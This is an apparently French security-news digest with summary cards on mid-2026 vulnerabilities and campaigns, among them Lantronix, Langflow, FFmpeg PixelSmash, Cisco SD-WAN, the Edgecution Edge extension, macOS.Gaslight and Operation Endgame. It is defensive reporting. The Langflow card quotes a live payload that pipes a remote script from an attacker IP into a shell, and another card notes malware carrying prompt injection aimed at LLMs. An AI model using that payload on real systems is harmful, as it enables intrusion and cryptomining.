CVE-2025-67038 : exécution de commandes arbitraires dans les convertisseurs Lantronix EDS5000 ajoutée au KEV CISA

đŸ—“ïž Contexte PubliĂ© le 24 juin 2026 par Dataminr (auteur : Joseph Slowik, Director of Threat Research and Cyber Engineering), cet article analyse l’ajout de CVE-2025-67038 au catalogue KEV (Known Exploited Vulnerabilities) de la CISA le 23 juin 2026, aux cĂŽtĂ©s de trois vulnĂ©rabilitĂ©s affectant la plateforme Ubiquiti. 🔍 VulnĂ©rabilitĂ© concernĂ©e CVE-2025-67038 : vulnĂ©rabilitĂ© d’injection de code / exĂ©cution de commandes arbitraires dans la plateforme Lantronix EDS5000 Le Lantronix EDS5000 est un convertisseur sĂ©rie-ethernet utilisĂ© dans l’automatisation industrielle et les environnements OT/IoT Ces dispositifs constituent des points de passage critiques (choke points) pour les opĂ©rations cyber-physiques L’ajout au KEV confirme une exploitation active documentĂ©e ⚠ Implications opĂ©rationnelles Exploitation possible entraĂźnant une perte ou un dĂ©ni de contrĂŽle sur des Ă©quipements industriels ou d’automatisation en aval Les environnements industriels Ă  haute disponibilitĂ© ne peuvent gĂ©nĂ©ralement pas appliquer des correctifs hors fenĂȘtre de maintenance planifiĂ©e Des mesures compensatoires sont nĂ©cessaires dans l’immĂ©diat đŸŽâ€â˜ ïž PrĂ©cĂ©dents d’acteurs Ă©tatiques 2015 – Ukraine : Sandworm (GRU russe) a attaquĂ© des sous-stations de distribution Ă©lectrique, dĂ©veloppant un payload de firmware malveillant pour « bricker » des convertisseurs sĂ©rie-ethernet, induisant une perte de contrĂŽle et compliquant la restauration ~2025 – Pologne : Berserk Bear (FSB russe) a exploitĂ© des identifiants par dĂ©faut sur des convertisseurs sĂ©rie-ethernet dans des entitĂ©s industrielles polonaises pour les rĂ©initialiser en paramĂštres d’usine, modifier les identifiants et les adresses IP, rendant les Ă©quipements inaccessibles 📌 Type d’article Analyse de menace Ă  visĂ©e opĂ©rationnelle, destinĂ©e aux Ă©quipes de sĂ©curitĂ© industrielle et OT, visant Ă  contextualiser l’ajout au KEV CISA et Ă  Ă©valuer le niveau de risque cyber-physique associĂ© Ă  CVE-2025-67038. ...

26 juin 2026 Â· 2 min

CVE-2026-33017 : des cryptomineurs Monero exploitent Langflow via RCE non authentifiée

🔍 Contexte PubliĂ© le 23 juin 2026 par Trend Micro (Simon Dulude et John Zhang), cet article prĂ©sente une analyse technique complĂšte d’une campagne de cryptominage exploitant CVE-2026-33017, une vulnĂ©rabilitĂ© d’exĂ©cution de code Ă  distance non authentifiĂ©e dans Langflow, un framework Python de construction de workflows LLM. 🎯 Vecteur d’accĂšs initial L’exploitation cible l’endpoint POST /api/v1/build_public_tmp/{flow_id}/flow de Langflow, qui Ă©value du code Python sans authentification. L’attaquant injecte __import__('os').system('curl http://83.142.209.214:8080/isp.sh | sh') pour dĂ©clencher la chaĂźne d’infection. Le mĂȘme flow_id UUID (0ee284cc-0eb1-493f-bc60-94fa8d1cfd18) est rĂ©utilisĂ© dans toutes les tentatives. La fenĂȘtre d’observation couvre 19 jours (27 mars – 15 avril 2026). ...

26 juin 2026 Â· 5 min

CVE-2026-8461 PixelSmash : RCE critique dans FFmpeg via le décodeur MagicYUV

đŸ—“ïž Contexte PubliĂ© le 23 juin 2026 par SecurityWeek (auteur : Ionut Arghire), cet article rapporte la divulgation par JFrog d’une vulnĂ©rabilitĂ© critique dans FFmpeg, le framework de traitement multimĂ©dia le plus utilisĂ© au monde, prĂ©sent dans la quasi-totalitĂ© des applications de traitement vidĂ©o. 🔍 DĂ©tails techniques de la vulnĂ©rabilitĂ© CVE : CVE-2026-8461 (CVSS 8.8) Nom : PixelSmash Type : Heap out-of-bounds write Composant affectĂ© : bibliothĂšque libavcodec de FFmpeg, dans le dĂ©codeur MagicYUV Cause : inconsistance entre le calcul des hauteurs de plan chroma par l’allocateur de frames et le dĂ©codeur MĂ©canisme d’exploitation : placement d’une commande shell NUL-terminĂ©e Ă  un offset hors-limites spĂ©cifique, ciblant la structure AVBuffer (objet de gestion de buffer Ă  comptage de rĂ©fĂ©rences), permettant l’exĂ©cution shell avant le crash du processus FFmpeg 🎯 Vecteurs d’exploitation Desktop : ouverture d’un fichier malveillant dans un lecteur vidĂ©o, ou navigation dans un dossier contenant le fichier si le gestionnaire de fichiers gĂ©nĂšre des miniatures Serveur : upload d’un fichier mĂ©dia vers un serveur mĂ©dia, plateforme de chat ou service de transcodage cloud qui traite automatiquement le fichier NAS / appliances / smart TV : gĂ©nĂ©ration de miniatures ou aperçus vidĂ©o Torrents (zero-click) : si le client torrent tĂ©lĂ©charge directement dans un dossier surveillĂ© par une bibliothĂšque mĂ©dia, le scan automatique dĂ©clenche le payload Nextcloud : via le fournisseur optionnel Movie preview qui invoque le binaire FFmpeg systĂšme pour gĂ©nĂ©rer des miniatures 📩 Format du payload Fichier de 50 Ko au format AVI, MKV ou MOV Aucune authentification, privilĂšge ou accĂšs prĂ©alable requis ✅ Applications confirmĂ©es comme vulnĂ©rables Kodi, mpv, ffmpegthumbnailer (GNOME, KDE, XFCE) Jellyfin, Emby, Nextcloud, Immich, PhotoPrism, OBS Studio RCE dĂ©montrĂ© contre Jellyfin đŸ› ïž Correctif FFmpeg version 8.1.2 contient le correctif pour PixelSmash. ...

26 juin 2026 Â· 2 min

Edgecution : extension Edge malveillante exploitant Native Messaging pour déployer un backdoor Python

📰 Source : BleepingComputer, publiĂ© le 24 juin 2026, basĂ© sur une analyse technique de Zscaler. 🎯 Contexte gĂ©nĂ©ral Des chercheurs de Zscaler ont documentĂ© une campagne d’attaque sophistiquĂ©e utilisant une extension malveillante pour Microsoft Edge, baptisĂ©e Edgecution, attribuĂ©e Ă  un initial access broker (IAB) liĂ© Ă  l’opĂ©ration ransomware Payouts Kings. 🔓 Vecteur d’accĂšs initial L’attaque dĂ©bute par une ingĂ©nierie sociale via Microsoft Teams : l’attaquant se fait passer pour du personnel IT et dirige les victimes vers une fausse page “Outlook Updates Management Console” imitant Microsoft. Cette page propose des boutons de tĂ©lĂ©chargement qui : ...

26 juin 2026 Â· 3 min

Edgecution : un broker d'accÚs initial déploie une extension Edge malveillante liée à Payouts King

🔍 Contexte PubliĂ© le 23 juin 2026 par Zscaler ThreatLabz, cet article prĂ©sente une analyse technique approfondie d’une campagne d’attaque attribuĂ©e Ă  un initial access broker (IAB) affiliĂ© au groupe ransomware Payouts King. 🎯 MĂ©canisme d’attaque La campagne repose sur deux vecteurs combinĂ©s : IngĂ©nierie sociale pour l’accĂšs initial Un mĂ©canisme innovant de livraison de malware via une extension malveillante pour Microsoft Edge L’extension abuse du protocole Chrome native messaging pour interagir avec des applications natives de l’hĂŽte, contournant ainsi le sandbox du navigateur. ...

26 juin 2026 Â· 2 min

Exploitation zero-day CVE-2026-20245 dans Cisco Catalyst SD-WAN par un acteur inconnu

🔍 Contexte PubliĂ© le 24 juin 2026 par Mandiant (Google Cloud Blog), ce rapport technique dĂ©taille une campagne d’intrusion ciblant l’infrastructure SD-WAN d’un fournisseur de services, identifiĂ©e en dĂ©but d’annĂ©e 2026. L’analyse couvre une activitĂ© s’étendant de fin 2025 Ă  mars 2026. 🎯 AccĂšs initial — Connexions de peering non autorisĂ©es De fin 2025 Ă  janvier 2026, Mandiant a observĂ© de multiples connexions de peering non autorisĂ©es vers les Ă©quipements Cisco Catalyst SD-WAN Manager de la victime. Ces connexions pourraient ĂȘtre liĂ©es Ă  l’exploitation de CVE-2026-20127 ou CVE-2026-20182, deux vulnĂ©rabilitĂ©s critiques permettant Ă  un attaquant distant non authentifiĂ© de contourner l’authentification et d’obtenir des privilĂšges administratifs. ...

26 juin 2026 Â· 4 min

macOS.Gaslight : backdoor Rust DPRK avec injection de prompt anti-LLM et C2 Telegram

🔍 Contexte PubliĂ© le 23 juin 2026 par SentinelLABS (Phil Stokes), cet article prĂ©sente l’analyse technique d’un implant macOS baptisĂ© macOS.Gaslight, dĂ©couvert aprĂšs une mise Ă  jour XProtect d’Apple dĂ©but juin 2026. L’échantillon avait Ă©tĂ© soumis sur VirusTotal le 22 mai 2026 et restait non dĂ©tectĂ© par les moteurs statiques au moment de la publication. 🎯 Attribution et cluster SentinelLABS attribue avec haute confiance cet implant Ă  un cluster d’activitĂ© macOS alignĂ© DPRK (CorĂ©e du Nord). Apple dĂ©tecte l’échantillon sous la rĂšgle XProtect MACOS_BONZAI_COBUCH, famille associĂ©e par SentinelLABS Ă  l’activitĂ© nord-corĂ©enne. Un Ă©chantillon BONZAI frĂšre est Ă©galement dĂ©tectĂ© par la rĂšgle AIRPIPE, Ă©galement liĂ©e Ă  la CorĂ©e du Nord. ...

26 juin 2026 Â· 4 min

Microsoft démantÚle Amadey et StealC via RICO et IA, ciblant 200+ serveurs C2

📅 Source : Microsoft On the Issues (blogs.microsoft.com), publiĂ© le 24 juin 2026, par Steven Masada, Assistant General Counsel de la Digital Crimes Unit (DCU) de Microsoft. 🎯 Contexte de l’opĂ©ration Microsoft annonce une action judiciaire coordonnĂ©e visant simultanĂ©ment deux outils cybercriminels largement utilisĂ©s : Amadey (loader/botnet facilitant l’accĂšs initial) et StealC (stealer de mots de passe et donnĂ©es sensibles). Ces deux malwares, dĂ©veloppĂ©s par des cybercriminels distincts, partagent la mĂȘme infrastructure. En deux semaines dĂ©but mai 2026, ils ont Ă©tĂ© liĂ©s Ă  plus de 140 000 ordinateurs infectĂ©s dans le monde. ...

26 juin 2026 Â· 3 min

OpĂ©ration Endgame : dĂ©mantĂšlement de SocGholish, Amadey et StealC, 41M€ saisis

🌐 Contexte Le 24 juin 2026, Europol publie un communiquĂ© officiel annonçant une nouvelle phase de l’Operation Endgame, la plus grande opĂ©ration internationale jamais menĂ©e contre les facilitateurs de ransomware. L’opĂ©ration a impliquĂ© des forces de l’ordre de Canada, Danemark, Allemagne, Pays-Bas, Royaume-Uni et États-Unis, coordonnĂ©es par Europol et Eurojust, avec la participation de partenaires privĂ©s dont Microsoft, Shadowserver, Proofpoint, IBM X-Force, Bitdefender et d’autres. 🎯 Actions menĂ©es Sur une pĂ©riode de deux semaines, les actions coordonnĂ©es ont permis : ...

26 juin 2026 Â· 3 min

Opération Endgame : démantÚlement des infrastructures Amadey et StealC par Europol et Microsoft

🌐 Contexte Source : BleepingComputer, publiĂ© le 24 juin 2026. Cet article couvre la derniĂšre phase de l’OpĂ©ration Endgame, une opĂ©ration coordonnĂ©e de forces de l’ordre et de partenaires privĂ©s ciblant des infrastructures cybercriminelles liĂ©es aux malwares Amadey et StealC, ainsi qu’au loader SocGholish (FakeUpdates). 🎯 PĂ©rimĂštre de l’opĂ©ration L’opĂ©ration a impliquĂ© des autoritĂ©s de plusieurs pays : Canada, Danemark, Allemagne, Pays-Bas, Royaume-Uni, États-Unis Coordination par Europol et Eurojust Partenaires privĂ©s : Microsoft, ESET, Proofpoint, IBM X-Force, Bitsight, Infoblox, Orange Cyberdefense, Shadowserver, Have I Been Pwned, Spamhaus. ...

26 juin 2026 Â· 3 min
Derniùre mise à jour le: 3 octobre 2026 📝